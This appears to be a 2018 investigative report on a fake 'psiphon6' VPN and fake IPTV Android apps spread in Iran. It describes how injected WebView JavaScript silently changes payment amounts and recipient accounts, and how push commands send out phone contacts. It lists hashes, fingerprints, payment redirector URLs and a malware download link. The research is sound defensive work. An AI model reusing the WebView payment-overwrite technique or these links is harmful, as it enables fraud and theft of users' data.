16 February 2018

Fraud, Phishing and Users at risk

It is now one month since we received the first report of the distribution of a Fake VPN Android App in Iran. In the first two Parts of our research we have documented what the App released in January was doing and how we traced it back to Amir Parsa Dehfuli, a freelance consultant of the company Ad-venture.ir in Iran. The application that caught our attention was advertised as the VPN “psiphon6” and it was taking advantage of the Telegram blocking in the country to distribute it. Once installed the application remained hidden in the mobile device acting as a “bot”, obeying commands sent from two Push Notification Services (pushe.co and onesignal.com).

The fake application with the internal Android name “ir.ops.breacker” was installed almost 120.000 times, 80% of those inside Iran and as we discovered later it was designing to increase “clicks” in Telegram posts, steal personal information and promote other malicious Android Apps.

One of the aspects that we managed to confirm is that the “fake app” psiphon6 was not written during the week of the Telegram blocking, Amir Parsa Dehfuli (APD) instead took the code of another fake application that he was already using, namely ir.persianlifeme.mahvare, and changed the logo and a few internal messages to make it look like “psiphon6”. While he and his friends at Ad-venture.ir were complaining about the Telegram blocking in Iran and the millions of jobs that were going to be lost, this Telegram blocking opened an opportunity for APD and his Namazhe Team to keep spreading the Android Trojan.

Linking “APD” with other fake Apps

One of the questions that we wanted to answer if this malware was connected with other fraudulent activities. According to Mohammadreza Niyazi, co-director of Ad-venture.ir, Amir Parsa is just a young talented programmer with lots of curiosity and “just playing” around. After two weeks of analysis we have identified thirty unique samples with common patterns. Using a Java Decompiler and running the samples in a sandbox, we found the following means to link them together:

Here it is a brief explanation of the methodology we have used:

Digital Signatures

The Android Applications are digitally signed and a Digital Certificate (CERT.RSA) contains the public key that allows the verification of the code’s digital signature. Two public keys “(SHA1) AB:65:DF:AB:8E:6C:FB:7E:46:E2:5A:14:19:4B:D3:A8:E5:F7:4A:E2 and (SHA1) C7:42:53:FD:1A:0D:D8:B1:32:84:FD:16:48:E5:04:FB:F8:4A:51:85” helped us to link together 23 samples (10 +13)

Re-use of code base

In order to quickly verify if the samples were re-using the code, we looked into total file size, file structure and the differences in certain files (e.g. buy.java, MainActivity.java)

Linked to payment portals

We looked for the presence of payment portals and redirection URLs (e.g. porche.ml, eligeram.net, elicharge.ir)

Share tokens in notification services

We looked into the Push Notification Service (PNS) of the applications and the tokens used to link applications that are just “repacks” with different names. We linked the Apps with common accounts in the pushe.co and onesignal.com accounts

Use short URL services

In the Apps that used SMS for distribution we looked for common short URL links in the services: yon.ir, bit.do and qqt.ir

Common IPTV service

In the Apps that contain a IPTV streaming service we looked for references to the service IPTV MAX and the dynamic domain name iptvir.ddns.me

What did we found?

This is “Namazhe Team”… it is just the beginning.

We found that “APD” and his “Namazhe Team” has been distributed fake Apps at least since March 2017 and we found two main codes used: IPTV (mahvare) and the later evolution Ops.breacker (psiphon6). We use here the names “mahvare” and “psiphon6” to refer to each of these attack branches and the different big phases of their spread campaigns. More on this in the Appendix A.

Mahvare (Portable Satellite)

The first application that APD distributed was a “Portable Satellite TV” application that allows you to watch pay TV channels in the Mobile phone using a IP TV streaming service. The application streams channels from a server hosted in the dynamic domain iptvir.ddns.me that seems connected to the service iptv-max.com.

The interesting part of the application is how the payment for the service takes place. The application launches a “WebView” that connects to the “Credit Card Portal” at “bmp.shaparak.ir” with SSL to pay for 20.000 IRR. The application ask for 0.54 USD to get activated something that many users might find more than reasonable, but when the user is sending the credit card details, Javascript injected from the “WebView” changes the total value to be paid and also the account number that will receive the payment.

In the code we decompiled we could see that four possible accounts are used to receive the payments. These accounts and real payment are not visible to the user.

With this technique, it is possible to control from an external server the real quantity that the user will pay, while overwriting in the App what the user thinks is paying.

Update!

In Iran the App Market Cafebazaar has a explicit policy about against using Webview in Android for payment platforms.

Ops.Breacker (psiphon6)

In July 2017, a new version of the “Mahvare” is released. The application simulates that can not be installed in the phone at all and instead of scamming users via IPTV payment services, focuses directly on operating as a more complex “Trojan” that can be fully controlled via Push Notifications.

The initial SMS used to distribute the new App used the text

“اینو نصب کن تا بدون کم شدن از شارژ اینترنت ، ماهواره رو تو گوشیت تماشا کنی”

(Install this so you can watch Satellite TV channels in your phone for free)

and this message has been changed in different SMS campaigns.

The first release of the App used the short URL http://bit.do/mahvares that redirected to http://uupload.ir/filelink/kONA6DtKKKHY/6tae_mahvare.apk

Users at risk

Data Exfiltration

Psiphon6 (ir.ops.breacker/ir.persianlifeme.irani) is able to exfiltrate the full Phone Contacts if requested by a Push Notification command. The command will include a webserver where to send the contacts. The variables p1 and p2 include in a GET request the name and phone number of each Phone contact.

Manipulating web content

In Android, webpages can be rendered in the mobile device calling the mobile web browser or using “Webview“. When handling a webpage with Webview, the developer of an App has the ability to use the method evaluateJavascript that can mangle the content of the page, i.e. the method evaluates JavaScript in the context of the currently displayed page.

What does this mean in practice? It means that once a page is loaded (onPageFinished) , webview can re-process the content and use Javascript (evaluate.Javascript) to change any elements of the page independently if the website is secured by SSL.

During the preparation of this report, we got in touch with an Iranian android developer Ali Molaei that explained us in detail how this attack works. He wanted to explain to people how risky is to input data inside of “Webviews” in Apps, so we came up with a challenge.

We invited Ali, to make a demo of the attack and manipulate the page: https://www.qurium.org/the-answer-is-42/.

Check out his video to see how he shows how to manipulate the Web Content of our demo page. WebView re-rendering in action.

Who is affected?

In nine months, a total of 1.6 million installations that has been distributed among 14 different Android Apps. While more than 90% of the infections have taken place in Iran, 60.000 users were affected in Europe or 30.000 in the USA.

IR	92.08%
US	1.74%
AE	1.60%
RO	1.47%
GB	0.72%
DE	0.63%
NL	0.52%
AF	0.27%
FR	0.16%
IQ	0.12%
TR	0.12%
IT	0.06%
MD	0.05%
CA	0.05%
IN	0.04%
SE	0.03%
SG	0.03%
JP	0.02%

Conclusions

During the last ten months of operation, APD and his Namazhe Team has managed to get installed more than 1.6 million fake applications in Mobile Users inside and outside Iran. While the main focus of the first fake App seemed to scam users in the payment of IPTV services, a second round of Applications focused on enriching the capabilities of the initial Trojan to drive Telegram traffic and steal personal information.

Acknowledgements

Thanks to:

The fantastic service Koodous that helped us to track and download the APK samples.
The project telescam.ir that gaves us a great insight into the IPTV Fraud.
@hooshmandk that released the first forensic report about this case in scriptics.ir.
Amin and Mahmood from Smallmedia, for our discussions about the RSA Cert fingerprinting.
ASL19 to get our executive summary translated in no time

Ali Molaei for his demo of the risks of opening pages in WebView

Appendix A

Version 1 (March – April)
ir.besteveryeverapp.telegram: 10 Mar 2017 IPTV Scam اهواره جیبی
ir.persianlifeme.mahvare: 30 Apr 2017 IPTV Scam

Version 2 (July – October – February 2018)
ir.persianlifeme.freeforall: 22 Jul 2017 SMS Breacker
ir.persianlifeme.vipforall: 26 Sep 2017 SMS Breacker
ir.persianlifeme.vipfora: 7 Oct 2017 SMS Breacker
ir.ops.breaker: 30 October 2017 SMS Breacker
ir.persianlifeme.irani: 30 Oct 2017 SMS Breacker

Version ? (April – July)

ir.milano.smartcall: 1 Apr 2017 MLNO?
ir.milano.driver1: 4 Apr 2017 MLNO?
ir.unclemilad.dotsgame: 26 Apr 2017 ???

ir.hamzad.telegram: 29 May 2017 MLNO?

https://cafebazaar.ir/app/ir.hamzad.telegram/ (Clone of this?)

ir.persianapps.androidhelpers: 16 May 2017

Promises to be able to track location of a person and ask for payment to elicharge.ir

http://elicharge.ir/findnumberonthemap.php?p1=

ir.appfarsi.tahahafez: 12 May 2017

https://cafebazaar.ir/app/ir.appfarsi.tahahafez/?l=en (Clone of this?)

http://elicharge.ir/Api-master/checkh.php پرداخت و ارتقا به نسخه کامل برنامه

ir.persianapps.aksprofilecartoon: 01 Jul 2017 ???

Appendix B: SHA1 Public Key, APP Name, SHA256 Hash, APP Size

1 AB:65:DF:AB:8E:6C:FB:7E:46:E2:5A:14:19:4B:D3:A8:E5:F7:4A:E2 ir.persianlifeme.mahvare 1898906b96588edef5b3b6561a7d50cffa4e41ec71bb173034ec84491029ceb0 3185622
2 AB:65:DF:AB:8E:6C:FB:7E:46:E2:5A:14:19:4B:D3:A8:E5:F7:4A:E2 ir.persianlifeme.mahvare 19f07af5b1556beade877bf25288391f41a11308161c904595fbde22ede20649 3192550
3 AB:65:DF:AB:8E:6C:FB:7E:46:E2:5A:14:19:4B:D3:A8:E5:F7:4A:E2 ir.persianlifeme.mahvare 228ef9283aba11d14aa2d93114dac55d92b558c020bd718bd25dabbd9a70e315 3191498
4 AB:65:DF:AB:8E:6C:FB:7E:46:E2:5A:14:19:4B:D3:A8:E5:F7:4A:E2 ir.persianlifeme.mahvare 4bee9bc2b16792f860dc6886cf1b8635cca827945081daca9048df8283f6312b 3088482
5 AB:65:DF:AB:8E:6C:FB:7E:46:E2:5A:14:19:4B:D3:A8:E5:F7:4A:E2 ir.persianlifeme.mahvare 53cc97ea897d90e3eed43007460944b0df1de9aed3e23029b35c825afd1479ec 3197278
6 AB:65:DF:AB:8E:6C:FB:7E:46:E2:5A:14:19:4B:D3:A8:E5:F7:4A:E2 ir.persianlifeme.mahvare 73efe7488ae28bedc9ba673c51db6aa4e0690d448a08c899e306bbecfb59104d 3191454
7 AB:65:DF:AB:8E:6C:FB:7E:46:E2:5A:14:19:4B:D3:A8:E5:F7:4A:E2 ir.persianlifeme.mahvare 9736a5072294cc79117e3e889d0ca3d7c4c771826f7763e036f50adbf97d6ac5 2978738
8 AB:65:DF:AB:8E:6C:FB:7E:46:E2:5A:14:19:4B:D3:A8:E5:F7:4A:E2 ir.persianlifeme.mahvare ab528d78f0fab21e46b25eceb193907c7483c83326f24279d0748a4f82c13fd2 3197278
9 AB:65:DF:AB:8E:6C:FB:7E:46:E2:5A:14:19:4B:D3:A8:E5:F7:4A:E2 ir.persianlifeme.mahvare cade7923aa9cba11725cbb7defb84114072ae540b65b58f1a7f4166a1c5bf132 3197042
10 AB:65:DF:AB:8E:6C:FB:7E:46:E2:5A:14:19:4B:D3:A8:E5:F7:4A:E2 ir.persianlifeme.mahvare da6272dbdf1d192c2b9eef8e8fd48e9e1cd27cc07eafa0a8c892aa757c712fb2 3197062

1 C7:42:53:FD:1A:0D:D8:B1:32:84:FD:16:48:E5:04:FB:F8:4A:51:85 ir.hakhaman.asystem fad4670f37a1586527e69b4a7e6a0abf733aa7149808c3ceea1911fd2e4328e3 1929084
2 C7:42:53:FD:1A:0D:D8:B1:32:84:FD:16:48:E5:04:FB:F8:4A:51:85 ir.ops.breacker 2d544bf5078c45cfacfa2e46984ac319ca727259867872748086430683904526 1941128
3 C7:42:53:FD:1A:0D:D8:B1:32:84:FD:16:48:E5:04:FB:F8:4A:51:85 ir.ops.breacker 2d6bea3fe3b3488310e8b5cb2dab80fac6da1869e8ba793602e8a745ef7fa495 1945380
4 C7:42:53:FD:1A:0D:D8:B1:32:84:FD:16:48:E5:04:FB:F8:4A:51:85 ir.ops.breacker 7cb4e5bd0112d8e202daa6ff9d3003dc9c7e6896d80ed795cf6ee9b6b85c552a 1818790
5 C7:42:53:FD:1A:0D:D8:B1:32:84:FD:16:48:E5:04:FB:F8:4A:51:85 ir.ops.breacker c4cb65c7be88280ab4b19e31050a39684f21adc60135b95f9fdf7834e3041eb4 1944128
6 C7:42:53:FD:1A:0D:D8:B1:32:84:FD:16:48:E5:04:FB:F8:4A:51:85 ir.ops.breacker d07e9e274e425f227f9268e9ae34f3c03b33e9b915375319d38a2125e6caf8e7 1941072
7 C7:42:53:FD:1A:0D:D8:B1:32:84:FD:16:48:E5:04:FB:F8:4A:51:85 ir.ops.irani b6b2343e9b7e068847bede4a6b3f174d3c49f7fcea9e740de7fee17b6a7b3304 1916051
8 C7:42:53:FD:1A:0D:D8:B1:32:84:FD:16:48:E5:04:FB:F8:4A:51:85 ir.persianlifeme.freeforall 26e4e7db2ac79cca27f1e448f304fa1c66d47f76accc0c33cf4884c2f480df01 1909464
9 C7:42:53:FD:1A:0D:D8:B1:32:84:FD:16:48:E5:04:FB:F8:4A:51:85 ir.persianlifeme.freeforall 3c0a0dc877f55c58a6a5bbf048f8c585e01beb5ed63b3e8c6983c3e3be191d2d 1908596
10 C7:42:53:FD:1A:0D:D8:B1:32:84:FD:16:48:E5:04:FB:F8:4A:51:85 ir.persianlifeme.irani 67cab7071889496001213a23e7b41aee2ecf18f6056eaba543b6a4e526b18faf 1909867
11 C7:42:53:FD:1A:0D:D8:B1:32:84:FD:16:48:E5:04:FB:F8:4A:51:85 ir.persianlifeme.irani e3db4f31aac338507227d6b668f107e7c0a05c81f89fcff9296b86231e6a7b8d 1918719
12 C7:42:53:FD:1A:0D:D8:B1:32:84:FD:16:48:E5:04:FB:F8:4A:51:85 ir.persianlifeme.vipforall ed910bef68ccb2eef63fa5db64031c490d8e716d0ed56baab5176420adaaf368 2255027
13 C7:42:53:FD:1A:0D:D8:B1:32:84:FD:16:48:E5:04:FB:F8:4A:51:85 ir.persianlifeme.vipforall ee8813b6191cfca80b09fca1a5d64db69936907a130e553c99d3d8c3c0546c46 2139363

Appendix C: The Account values

innerHTML values

8 2223566
40  2168264
40  6541864
40  8162547
40  8165486
80 2175381

Initialization values
33 t1  2180607
33 t2  2223566

Appendix D: Payment Redirectors

4 http://Proche.ml/paymah
4 http://Proche.ml/paymass
41 http://Proche.ml/paymdow
4 http://Proche.ml/paymup4
4 https://hamzad.net/paymahcenter
2 https://hamzad.net/paymahz
6 https://hamzad.net/paytel
2 https://hamzad.net/paytv
14 https://hamzad.net/paytvday2
9 https://hamzad.net/paytvday3

Parsa was a rich kid and didn’t expect us to pay him. He did the telegram work and we did our job.

Mohammadreza Niyazi – Co-Founder Ad-venture.ir

Cookie	Duration	Description
cookielawinfo-checbox-analytics	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checbox-functional	11 months	The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checbox-others	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-necessary	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-performance	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy	11 months	The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.